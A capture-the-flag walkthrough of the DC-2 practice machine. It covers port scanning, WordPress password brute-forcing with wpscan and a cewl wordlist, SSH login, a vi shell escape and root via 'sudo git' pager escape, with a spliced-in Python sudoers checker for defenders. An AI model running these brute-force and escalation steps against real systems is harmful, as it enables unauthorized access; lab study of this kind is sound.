DC-2 (Walkthrough)

Starting with enumeration to find the IP of the machine using a “netdiscover” scan.

netdiscover -i vboxnet1

Here I got the IP of the machine, 192.168.57.106, so now I proceed to scan the services running on it using an “nmap” scan.

nmap -v -sT -p- 192.168.57.106

Here I found two open ports, 80 and 7744. So I started a deeper scan to get the details of the services running on those ports along with their versions.

nmap -v -A -sT -p- 192.168.57.106

Here an Apache server is up on port 80 and the “ssh” service is running on port 7744. Next I take a look at the web server to see what is running there and whether it gives away any information.

Browsing the URL “http://192.168.57.106”

Here I got a flag link, which is the first flag. Moving to that:

After reading the flag I moved to the terminal to collect the words present on the website into a file named pass.txt using “cewl”.

cewl http://dc-2 > pass.txt

Now using the “wpscan” tool to enumerate the names of the WordPress users.

wpscan --url dc-2 -e u

Here I got the usernames. With these users I again use the “wpscan” tool to find passwords to log in to WordPress.

wpscan -U admin,jerry,tom --url dc-2 -P pass.txt

Username: jerry, Password: adipiscing

Username: tom, Password: parturient

Using the above-mentioned credentials I tried to log in to the ssh service. I was not able to log in as the user “jerry”, so I tried “tom” and here I got logged in.

ssh tom@192.168.57.106 -p 7744

After logging in I found two files.

Here I check which commands the user “tom” can run.

tom@DC-2:~$ ls -la usr/bin

Here the user tom has permission to use the “vi” command, so I get a bash shell from within “vi”.

tom@DC-2:~$ vi
> :set shell=/bin/bash
> :shell

After setting the shell to /bin/bash I set the PATH so the standard commands can be found:

tom@DC-2:~$ export PATH=/bin:/usr/bin/

Here we get a bash shell. Now I can read the flag3.txt file.

tom@DC-2:~$ cat flag3.txt

Here I switched to the user “jerry” to get another flag.

tom@DC-2:~$ su jerry

Username: jerry, Password: adipiscing

I checked which commands this normal user is allowed to run as root.

jerry@DC-2:/home/tom$ sudo -l

Got it: the user can run the “git” command as root.

Before proceeding I check whether any flag is available here, and I found a file named flag4.txt.

cat flag4.txt

As the flag says, I have to use the “git” command here to proceed, after minimizing the terminal window so that the help output goes through the pager.

jerry@DC-2:~$ sudo git -p --help
> !/bin/bash

Well, here I got the root shell.
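As a defender-side counterpart to the two escalation steps above (tom's “vi” and jerry's “sudo git”), here is an added example that is not part of the original write-up: it parses sudoers-style text and flags rules that hand a user a binary able to spawn a shell or pager from inside itself. The sudoers content and the user names in it are constructed for the example.

```python
import os
import re

# Sudo-granted binaries that can spawn a shell or pager from inside themselves
# (git's pager and vi are the two the DC-2 box relies on).
ESCAPE_CAPABLE = {"git", "vi", "vim", "less", "more", "man"}

# Constructed sample sudoers content, not DC-2's real /etc/sudoers.
SAMPLE_SUDOERS = """\
root    ALL=(ALL:ALL) ALL
jerry   ALL=(root) NOPASSWD: /usr/bin/git
tom     ALL=(ALL) NOPASSWD: /bin/systemctl restart apache2   # harmless
%admin  ALL=(ALL) ALL
"""

# user  host=(runas) TAG: cmd1, cmd2
RULE_RE = re.compile(r"^(?P<user>\S+)\s+\S+\s*=\s*(?:\([^)]*\)\s*)?"
                     r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_rules(text):
    """Return (user, nopasswd, [commands]) for each user specification line."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # strip comments
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if m:
            cmds = [c.strip() for c in m.group("cmds").split(",")]
            rules.append((m.group("user"), "NOPASSWD:" in m.group("tags"), cmds))
    return rules


def find_escape_risks(text):
    """Flag (user, binary, nopasswd) for rules granting an escape-capable binary."""
    risks = []
    for user, nopasswd, cmds in parse_rules(text):
        for cmd in cmds:
            if cmd == "ALL":
                continue    # full sudo is a policy choice, not a hidden escape
            binary = os.path.basename(cmd.split()[0])
            if binary in ESCAPE_CAPABLE:
                risks.append((user, binary, nopasswd))
    return risks
```

Running `find_escape_risks` over a real `/etc/sudoers` (and `/etc/sudoers.d/*`) gives a quick list of rules to replace with a wrapper script or a restricted alternative.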

root@DC-2:/home/jerry# id
root@DC-2:/home/jerry# cd; ls
root@DC-2:~# cat final-flag.txt

Here we go: good to see the final flag of the machine. I enjoyed the CTF and learned about some interesting tools.
